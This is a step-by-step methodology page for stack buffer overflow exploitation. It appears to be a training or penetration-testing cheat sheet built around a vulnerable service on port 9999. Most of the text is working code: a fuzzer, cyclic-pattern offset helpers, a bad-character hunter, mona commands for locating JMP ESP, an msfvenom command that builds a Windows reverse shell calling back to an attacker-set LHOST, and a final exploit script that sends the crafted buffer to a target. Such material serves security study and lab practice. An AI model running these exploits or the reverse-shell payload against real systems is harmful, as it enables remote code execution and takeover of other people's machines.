💥 Buffer Overflow
Structured methodology for stack-based buffer overflow exploitation.
METHODOLOGY
1. Fuzzing — Find the crash point
Send increasing payloads to identify the approximate crash offset
import socket

buffer = b"A" * 100
while True:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)          # a hung service counts as a crash; don't block forever
        s.connect(("$IP", 9999))
        s.send(buffer + b"\r\n")
        s.close()
        buffer += b"A" * 100     # grow the payload by 100 bytes each round
    except OSError:              # refused / reset / timeout (socket.timeout is an OSError)
        print(f"Crashed at {len(buffer)} bytes")
        break
Example Output
Crashed at 2500 bytes
2. Find exact offset
Use pattern_create to find the EIP offset — Tells you exactly which bytes of the buffer land in EIP
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2500
# Send the pattern as payload, note EIP value
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 2500 -q <EIP_VALUE>
Example Output
[*] Exact match at offset 2003
EIP is at bytes 2003-2006
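To show what pattern_create and pattern_offset actually do, here is an added Python reimplementation of the Metasploit-style cyclic pattern; it is example code written for this page, not the Metasploit tools' own source. It reuses the pattern length 2500 and offset 2003 from the steps above; the EIP value 0x386F4337 is a constructed debugger reading, chosen because it is exactly the four pattern bytes at offset 2003 read back as a little-endian dword.

```python
import itertools
import string
import struct


def pattern_create(length):
    """Metasploit-style cyclic pattern: Aa0Aa1Aa2...Aa9Ab0... Every 3-byte triple
    is unique for 26*26*10 triples (20280 bytes), so any 4-byte window occurs once."""
    out = bytearray()
    for upper, lower, digit in itertools.product(
            string.ascii_uppercase, string.ascii_lowercase, string.digits):
        out += (upper + lower + digit).encode()
        if len(out) >= length:
            break
    return bytes(out[:length])


def pattern_offset(length, eip):
    """Return the offset of the four pattern bytes that ended up in EIP, or None.
    `eip` may be the register value as the debugger shows it (int 0x386F4337 or the
    hex string '386F4337') or the raw 4 bytes as they sat in memory (b'7Co8').
    A register value is converted back to memory order by little-endian packing."""
    if isinstance(eip, bytes):
        needle = eip
    elif isinstance(eip, int):
        needle = struct.pack("<I", eip)
    else:
        needle = struct.pack("<I", int(eip, 16))
    pos = pattern_create(length).find(needle)
    return None if pos == -1 else pos


if __name__ == "__main__":
    # Constructed debugger reading for the 2500-byte pattern from the step above.
    print(pattern_offset(2500, 0x386F4337))  # 2003
```

The little-endian step is the part people get wrong by hand: the debugger shows EIP as 0x386F4337, but the bytes that overwrote it sat in memory as 37 43 6F 38, i.e. the ASCII "7Co8" starting at offset 2003.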
3. Confirm EIP control
Overwrite EIP with known value — Verify you control execution flow
offset = 2003
buffer = b"A" * offset + b"B" * 4 + b"C" * (2500 - offset - 4)
# EIP should be 42424242 (BBBB)
4. Find bad characters
Send all bytes 0x00-0xFF — Identify characters that break the shellcode
# Every byte 0x01-0xFF; \x00 is almost always bad, so it is left out from the start
badchars = bytes(range(0x01, 0x100))
# Send it after the EIP overwrite: buffer = b"A" * offset + b"B" * 4 + badchars
# Compare in debugger (dump at ESP): any byte that doesn't appear, is changed, or
# corrupts the bytes after it = bad. Remove it from badchars and re-send until the
# dump matches what was sent byte for byte.
5. Find JMP ESP
Locate a JMP ESP instruction in a module without ASLR/DEP — This becomes your return address
# In Immunity Debugger with mona:
!mona jmp -r esp -cpb "\x00"
# Or find manually:
!mona modules # Find module with no protections
!mona find -s "\xff\xe4" -m <module.dll>
Example Output
0x625011af : jmp esp | {PAGE_EXECUTE_READ} [essfunc.dll]
ASLR: False, Rebase: False, SafeSEH: False
Use this address as your EIP overwrite (little endian)
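The debugger comparison in step 4 and the "no bad bytes in the return address" check that mona's -cpb performs in step 5 are the same operation: look for a byte the target mangles. The Python below is an added example written for this page (not code from mona or from the page's own scripts) that automates both. fake_target is a constructed stand-in for the send-and-dump round trip, simulating a service that stops parsing at the first CR or LF; the second candidate address 0x00401000 is made up purely because it contains a null byte.

```python
import struct


def badchar_payload(exclude):
    """All byte values except the ones already known to be bad."""
    return bytes(b for b in range(256) if b not in exclude)


def first_bad_char(sent, dumped):
    """Walk the sent payload and the bytes dumped from ESP in lockstep. The first
    position that is missing or changed identifies the bad byte; everything after
    it is unreliable, so only one bad char is reported per round."""
    for i, b in enumerate(sent):
        if i >= len(dumped) or dumped[i] != b:
            return b
    return None


def hunt_bad_chars(send_and_dump, known_bad=(0x00,)):
    """Repeat send / dump / compare, excluding each bad byte found, until the dump
    matches the payload exactly. Returns the sorted list of bad bytes."""
    bad = set(known_bad)
    while True:
        payload = badchar_payload(bad)
        found = first_bad_char(payload, send_and_dump(payload))
        if found is None:
            return sorted(bad)
        bad.add(found)


def bad_bytes_in(blob, bad):
    """Bytes of `blob` (shellcode or a packed address) that are on the bad list."""
    return sorted(set(b for b in blob if b in bad))


def pack_address(addr):
    """Little-endian form of a 32-bit address, as it must appear in the buffer."""
    return struct.pack("<I", addr)


def fake_target(payload):
    """Constructed stand-in for the debugger round trip: this 'service' stops
    parsing at the first CR or LF, so those bytes and everything after them
    never reach the stack."""
    cut = len(payload)
    for terminator in (0x0d, 0x0a):
        if terminator in payload:
            cut = min(cut, payload.index(terminator))
    return payload[:cut]


if __name__ == "__main__":
    bad = hunt_bad_chars(fake_target)
    print([hex(b) for b in bad])                    # ['0x0', '0xa', '0xd']
    for candidate in (0x625011af, 0x00401000):      # second address is made up
        packed = pack_address(candidate)
        print(hex(candidate), packed, bad_bytes_in(packed, bad))
```

Against a real target, send_and_dump would be the manual loop of sending the payload and pasting the ESP dump back; the one-bad-byte-per-round rule is deliberate, because a byte that truncates input hides everything after it. Run bad_bytes_in over the msfvenom output as well before using it: -b tells the encoder what to avoid, and this confirms it did.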
6. Generate shellcode
msfvenom payload excluding bad chars — Reverse shell or bind shell
msfvenom -p windows/shell_reverse_tcp LHOST=$LHOST LPORT=4444 -b "\x00" -f python -v shellcode
7. Final exploit
Combine all components — NOP sled + shellcode
import socket
offset = 2003
jmp_esp = b"\xaf\x11\x50\x62" # 0x625011af in little endian
nop_sled = b"\x90" * 16
shellcode = b"" # paste msfvenom output here
buffer = b"A" * offset + jmp_esp + nop_sled + shellcode
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("$IP", 9999))
s.send(buffer + b"\r\n")
s.close()
QUICK CHECKLIST
BOF exploit development order
Follow this exact order every time — Don't skip steps
1. Fuzz → find approximate crash length
2. pattern_create → find exact EIP offset
3. Confirm EIP control with "BBBB" (0x42424242)
4. Bad chars → test 0x01-0xFF (0x00 always bad)
5. JMP ESP → find in unprotected module
6. Shellcode → msfvenom with -b for bad chars
7. Exploit → offset + JMP ESP + NOPs + shellcode
COMMON BAD CHARACTERS
Usual suspects
These are frequently bad — Always test all 256 though
\x00 Null byte (almost always bad)
\x0a Line feed (\n)
\x0d Carriage return (\r)
\x25 Percent (%)
\x2b Plus (+)
\x2f Forward slash (/)
\x5c Backslash (\)